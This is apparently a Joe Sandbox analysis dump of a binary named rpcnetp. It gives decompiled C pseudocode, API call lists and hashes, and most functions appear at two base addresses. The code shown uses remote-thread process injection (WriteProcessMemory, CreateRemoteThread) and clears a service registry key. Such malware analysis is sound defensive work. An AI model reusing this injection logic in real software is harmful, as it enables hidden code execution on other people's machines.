  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
  • String ID:
  • API String ID: 2359640614-0
  • Opcode ID: 26f157f04d120a53b1cbb107033abb21990728d417087b3eb5e107813db18389
  • Instruction ID: 29b8b4f74a95a23194c38b4f8543aa8665ab8fa1b511f83a033bb6963feef6d0
  • Opcode Fuzzy Hash: 26f157f04d120a53b1cbb107033abb21990728d417087b3eb5e107813db18389
  • Instruction Fuzzy Hash: 991160B2990314EFD7209F66CC89E6B7BFCFB95782B21491DB405D3182D7304944CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12);
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0x72b260c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}

APIs
  • RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
  • RegDeleteValueA.ADVAPI32(?,?), ref: 72B222E7
  • RegEnumValueA.ADVAPI32 ref: 72B22300
  • RegCloseKey.ADVAPI32(?), ref: 72B22309
Strings
  • System\CurrentControlSet\Services\rpcnetp, xrefs: 72B222A0
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Value$CloseDeleteEnumOpenQuery
  • String ID: System\CurrentControlSet\Services\rpcnetp
  • API String ID: 1768883651-3077676073
  • Opcode ID: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
  • Instruction ID: a7eab7136433f130f13a6380ef9fab967bd967ebe69315b92658c948a71fe067
  • Opcode Fuzzy Hash: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
  • Instruction Fuzzy Hash: 9E010C76901218BBDB219A96CD48EDF7FBCEF452A1F101065FA05F2002D7319A45EBB4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E72B21F95(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t72;
				void* _t78;
				void* _t83;
				void* _t84;
				signed int _t95;

				_t78 = __edx;
				_push(0x6c0);
				_push(0x72b253a8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x24)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E72B24D2D(_t84 - 0x3a0, 0, 0x32e);
				 *((short*)(_t84 - 0x398)) = 0x32a;
				E72B24D14(_t84 - 0x6d0, _t84 - 0x3a0, 0x32e);
				E72B24D44(_t84 - 0x70, _t84 - 0x6c8, _t84 - 0x398);
				 *((intOrPtr*)(_t84 - 0x3c)) = E72B25277;
				 *((intOrPtr*)(_t84 - 0x38)) = E72B25313;
				 *((intOrPtr*)(_t84 - 0x34)) = E72B2224A;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x30) = _t83;
				 *_t83 = 0x237;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x24)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E72B23223(E72B21C7B), _t83, 4, _t84 - 0x28);
					 *(_t84 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t84 + 8) = E72B21829;
				if( *((intOrPtr*)(_t83 + 0x6c)) == 4) {
					 *(_t84 + 8) = 0;
				}
				_t75 = _t83 + 0x1bc8;
				if(E72B21775(_t83, _t83 + 0x1bc8, 0, 2) == 0 || E72B21775(_t83, _t83 + 0x78,  *(_t84 + 8), 1) == 0) {
					L15:
					return E72B2159C(E72B24DC6(_t78, _t95, _t84 - 0x70), _t78);
				} else {
					 *(_t84 - 4) = 0;
					if( *((intOrPtr*)(_t84 - 0x24)) == 0) {
						E72B22429(_t75, 0);
					}
					if( *(_t84 - 0x1c) == 0) {
						do {
							_push(_t84 - 0x70);
							__eflags = E72B21D27(_t75, _t78, 0, _t83, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t84 - 0x1c));
						WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
						CloseHandle( *(_t84 - 0x1c));
						L14:
						_t42 = _t84 - 4;
						 *_t42 =  *(_t84 - 4) | 0xffffffff;
						_t95 =  *_t42;
						goto L15;
					}
				}
			}

APIs
  • GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21C37,?), ref: 72B21FB7
    • Part of subcall function 72B24D44: GetVersion.KERNEL32(?,72B26150,00000034,0000032E,?,72B22004,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B24D61
  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
  • ResumeThread.KERNEL32(?), ref: 72B220C1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
  • CloseHandle.KERNEL32(?), ref: 72B220D9
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
  • String ID:
  • API String ID: 3869061129-0
  • Opcode ID: 11a120d3f7cb7f11abcc42cdc696da354dd517c25bf4f2de8dc470e5de7004bf
  • Instruction ID: 355344fad5c52479a02bf13cfb35cb00ff9462887997cb78211b3fa50bd0aa08
  • Opcode Fuzzy Hash: 11a120d3f7cb7f11abcc42cdc696da354dd517c25bf4f2de8dc470e5de7004bf
  • Instruction Fuzzy Hash: A4418BB1C00318ABDF21CFA9CC84EDFBAF8EF84351F10461AE55AA6091E7745A41CF64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E00A11F95(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t72;
				void* _t82;
				void* _t83;
				signed int _t94;

				_push(0x6c0);
				_push(0xa153a8);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t83 - 0x20) = 0;
				 *(_t83 - 0x1c) = 0;
				 *((intOrPtr*)(_t83 - 0x24)) = 0;
				 *(_t83 - 0x20) = GetStdHandle(0xfffffff4);
				E00A14D2D(_t83 - 0x3a0, 0, 0x32e);
				 *((short*)(_t83 - 0x398)) = 0x32a;
				E00A14D14(_t83 - 0x6d0, _t83 - 0x3a0, 0x32e);
				E00A14D44(_t83 - 0x70, _t83 - 0x6c8, _t83 - 0x398);
				 *((intOrPtr*)(_t83 - 0x3c)) = E00A15277;
				 *((intOrPtr*)(_t83 - 0x38)) = E00A15313;
				 *((intOrPtr*)(_t83 - 0x34)) = E00A1224A;
				_t82 =  *(_t83 + 8);
				 *(_t83 - 0x30) = _t82;
				 *_t82 = 0x237;
				 *((intOrPtr*)(_t82 + 4)) = 6;
				if( *(_t83 - 0x20) != 0 &&  *(_t83 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t83 - 0x24)) = 1;
					 *(_t82 + 0x1bbc) =  *(_t82 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t83 - 0x20), 0, 0, E00A13223(E00A11C7B), _t82, 4, _t83 - 0x28);
					 *(_t83 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t82 + 0x1bbc) =  *(_t82 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t83 + 8) = E00A11829;
				if( *((intOrPtr*)(_t82 + 0x6c)) == 4) {
					 *(_t83 + 8) = 0;
				}
				_t75 = _t82 + 0x1bc8;
				if(E00A11775(_t82, _t82 + 0x1bc8, 0, 2) == 0 || E00A11775(_t82, _t82 + 0x78,  *(_t83 + 8), 1) == 0) {
					L15:
					return E00A1159C(E00A14DC6(_t94, _t83 - 0x70));
				} else {
					 *(_t83 - 4) = 0;
					if( *((intOrPtr*)(_t83 - 0x24)) == 0) {
						E00A12429(_t75, 0);
					}
					if( *(_t83 - 0x1c) == 0) {
						do {
							_push(_t83 - 0x70);
							__eflags = E00A11D27(_t75, 0, _t82, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t83 - 0x1c));
						WaitForMultipleObjects(2, _t83 - 0x20, 0, 0xffffffff);
						CloseHandle( *(_t83 - 0x1c));
						L14:
						_t42 = _t83 - 4;
						 *_t42 =  *(_t83 - 4) | 0xffffffff;
						_t94 =  *_t42;
						goto L15;
					}
				}
			}

APIs
  • GetStdHandle.KERNEL32(000000F4,00A153A8,000006C0,00A11C37,?), ref: 00A11FB7
    • Part of subcall function 00A14D44: GetVersion.KERNEL32(?,00A16150,00000034,0000032E,?,00A12004,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A14D61
  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A12033
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 00A1205F
  • ResumeThread.KERNEL32(?), ref: 00A120C1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A120D0
  • CloseHandle.KERNEL32(?), ref: 00A120D9
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
  • String ID:
  • API String ID: 3869061129-0
  • Opcode ID: f54de70cf94d1d0c6bec5a6e01abc851b10e3f7ee939da76f352086237842c53
  • Instruction ID: 277028db6a4a490f77cbeaa80d0e5255b9867b1d02e9fb5080022b90e3ebbaa6
  • Opcode Fuzzy Hash: f54de70cf94d1d0c6bec5a6e01abc851b10e3f7ee939da76f352086237842c53
  • Instruction Fuzzy Hash: 5A4159B1C00618AADF21DFA4DD45EEEBBBCBF49350F10421AF695A6190D7749AC1CF60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				intOrPtr _t53;
				void* _t56;

				E72B24D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E72B22D40( &_v144);
						return PostMessageA( *0x72b2600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					if( *0x72b260ce != 0) {
						_t53 = 0x72b260ce;
					}
					if(E72B22D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))) > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E72B24D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E72B21C2C, _t56, 0,  &_v16);
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1);
					}
				}
				E72B21F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}

APIs
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 72B23072
  • LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 72B23088
  • GetCurrentThreadId.KERNEL32 ref: 72B2309C
  • CreateThread.KERNEL32(00000000,00000000,Function_00001C2C,00000000,00000000,?), ref: 72B230D0
  • SetThreadPriority.KERNEL32(?,000000F1), ref: 72B230F2
  • PostMessageA.USER32 ref: 72B23125
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
  • String ID:
  • API String ID: 2250156434-0
  • Opcode ID: a27942b64084d6f373f2d952d1f4d1d09f7ca68c105ca6b079fd26903a4ef7d8
  • Instruction ID: 600c3e933443d6e78f6ca0bd9c7fa0cb8a0584d99d1a0196c81ce118fa489354
  • Opcode Fuzzy Hash: a27942b64084d6f373f2d952d1f4d1d09f7ca68c105ca6b079fd26903a4ef7d8
  • Instruction Fuzzy Hash: 1A316171900704BFDB219BA9CC49FCBBBFCEB84746F104559F65AE6181E7709A48CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A12FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				intOrPtr _t53;
				void* _t56;

				E00A14D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E00A12D40( &_v144);
						return PostMessageA( *0xa1600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					if( *0xa160ce != 0) {
						_t53 = 0xa160ce;
					}
					if(E00A12D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))) > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E00A14D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E00A11C2C, _t56, 0,  &_v16);
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1);
					}
				}
				E00A11F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}

APIs
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 00A13072
  • LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 00A13088
  • GetCurrentThreadId.KERNEL32 ref: 00A1309C
  • CreateThread.KERNEL32(00000000,00000000,Function_00001C2C,00000000,00000000,?), ref: 00A130D0
  • SetThreadPriority.KERNEL32(?,000000F1), ref: 00A130F2
  • PostMessageA.USER32 ref: 00A13125
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
  • String ID:
  • API String ID: 2250156434-0
  • Opcode ID: d7cbe5c6dad7131069d06c2b4e33eec105a11d0ab6a226dbf8cc942ba869b434
  • Instruction ID: 1d5784b7827291de9282786491dfc428f6b6a746be1b0c3c5dfc98a212d99876
  • Opcode Fuzzy Hash: d7cbe5c6dad7131069d06c2b4e33eec105a11d0ab6a226dbf8cc942ba869b434
  • Instruction Fuzzy Hash: 0831AA72900608BFDF21DFA5DC49FDABBBCEB48700F10825AF655E6181D7749A85CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E72B21C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x72b25398);
				E72B24A94(_t40, _t44, _t46);
				 *(_t48 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t45 = GetStdHandle(0xfffffff4);
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				if( *(_t48 - 0x1c) != 0) {
					_push(_t48 - 0x20);
					_t41 = 4;
					_t47 =  *(_t48 + 8);
					if(WriteProcessMemory(_t45, _t47 + 0x84, _t48 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t45, _t47,  *(_t48 - 0x1c), 0x78, _t48 - 0x20) != 0) {
						 *( *(_t48 - 0x1c) + 0x6c) = _t41;
						 *( *(_t48 - 0x1c) + 0x70) =  *( *(_t48 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t48 - 0x1c) + 0x370c) =  *( *(_t48 - 0x1c) + 0x370c) | _t41;
						 *( *(_t48 - 0x1c) + 0x1bd4) = _t47;
						E72B21F95(_t41, _t42, _t43, _t45, _t47,  *( *(_t48 - 0x1c) + 0x370c),  *(_t48 - 0x1c));
					}
					LocalFree( *(_t48 - 0x1c));
				}
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				ExitThread(0);
			}

APIs
  • LocalAlloc.KERNEL32(00000040,00004464,72B25398,00000010), ref: 72B21C8E
  • GetStdHandle.KERNEL32(000000F4), ref: 72B21C99
  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 72B21CC2
  • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 72B21CD7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21C37,?), ref: 72B21FB7
    • Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
    • Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
    • Part of subcall function 72B21F95: ResumeThread.KERNEL32(?), ref: 72B220C1
    • Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
    • Part of subcall function 72B21F95: CloseHandle.KERNEL32(?), ref: 72B220D9
  • LocalFree.KERNEL32(00000000), ref: 72B21D0B
  • ExitThread.KERNEL32 ref: 72B21D20
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
  • String ID:
  • API String ID: 3187294079-0
  • Opcode ID: eb10873bd4b33ee44731de4874c76e1266a4d0df7197caff664842dd91625b3e
  • Instruction ID: c86dc8486e0665793866c7a9820250b529532658d765509b66e6b22a8b28303e
  • Opcode Fuzzy Hash: eb10873bd4b33ee44731de4874c76e1266a4d0df7197caff664842dd91625b3e
  • Instruction Fuzzy Hash: 52113A7295034AEFDB118FA5CC48FEE7BF8EB44361F158229E529B7192D7389501CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
			E00A11C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_push(0x10);
				_push(0xa15398);
				E00A14A94(_t40, _t43, _t45);
				 *(_t47 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t44 = GetStdHandle(0xfffffff4);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if( *(_t47 - 0x1c) != 0) {
					_push(_t47 - 0x20);
					_t41 = 4;
					_t46 =  *(_t47 + 8);
					if(WriteProcessMemory(_t44, _t46 + 0x84, _t47 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t44, _t46,  *(_t47 - 0x1c), 0x78, _t47 - 0x20) != 0) {
						 *( *(_t47 - 0x1c) + 0x6c) = _t41;
						 *( *(_t47 - 0x1c) + 0x70) =  *( *(_t47 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t47 - 0x1c) + 0x370c) =  *( *(_t47 - 0x1c) + 0x370c) | _t41;
						 *( *(_t47 - 0x1c) + 0x1bd4) = _t46;
						E00A11F95(_t41, _t42, _t44, _t46,  *( *(_t47 - 0x1c) + 0x370c),  *(_t47 - 0x1c));
					}
					LocalFree( *(_t47 - 0x1c));
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				ExitThread(0);
			}

APIs
  • LocalAlloc.KERNEL32(00000040,00004464,00A15398,00000010), ref: 00A11C8E
  • GetStdHandle.KERNEL32(000000F4), ref: 00A11C99
  • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 00A11CC2
  • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 00A11CD7
    • Part of subcall function 00A11F95: GetStdHandle.KERNEL32(000000F4,00A153A8,000006C0,00A11C37,?), ref: 00A11FB7
    • Part of subcall function 00A11F95: GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A12033
    • Part of subcall function 00A11F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 00A1205F
    • Part of subcall function 00A11F95: ResumeThread.KERNEL32(?), ref: 00A120C1
    • Part of subcall function 00A11F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A120D0
    • Part of subcall function 00A11F95: CloseHandle.KERNEL32(?), ref: 00A120D9
  • LocalFree.KERNEL32(00000000), ref: 00A11D0B
  • ExitThread.KERNEL32 ref: 00A11D20
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
  • String ID:
  • API String ID: 3187294079-0
  • Opcode ID: a37cf31ac386f91ef938f27a3bc639ef983b3d1810c9d360dab52811b546b64a
  • Instruction ID: 0d35ea56b8990a247a879ad1b9c30cd8043350959af957f06f2c6be90fb46c1a
  • Opcode Fuzzy Hash: a37cf31ac386f91ef938f27a3bc639ef983b3d1810c9d360dab52811b546b64a
  • Instruction Fuzzy Hash: 3E110A71E4024AEFDB10DFA4D849FEE7BB8AB08761F148115F625A61A0D7389982CB11
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B21775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t25;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t25 = _a4;
					 *((intOrPtr*)(_t40 + 0x1b48)) = _t25;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *((intOrPtr*)(_t25 + 0x70));
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E72B216BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16);
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8);
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}

APIs
  • InitializeCriticalSection.KERNEL32(?), ref: 72B217AD
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B217C0
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B217CD
  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72B217F1
  • SetThreadPriority.KERNEL32(?,?), ref: 72B2180A
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Create$EventThread$CriticalInitializePrioritySection
  • String ID:
  • API String ID: 2454249074-0
  • Opcode ID: 215d35c185ac9572e93c9689a794df72fea7adc102145aefd910f693528aebe6
  • Instruction ID: 2b7b849261d314237348428b04d03b57a499ce12b49900591cbacb009e5b40d1
  • Opcode Fuzzy Hash: 215d35c185ac9572e93c9689a794df72fea7adc102145aefd910f693528aebe6
  • Instruction Fuzzy Hash: 41117C32110784AFC7319F2ACC84EE7BBF9FBC9751B14891EF96A86102E331A440DB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A11775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t25;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t25 = _a4;
					 *((intOrPtr*)(_t40 + 0x1b48)) = _t25;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *((intOrPtr*)(_t25 + 0x70));
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
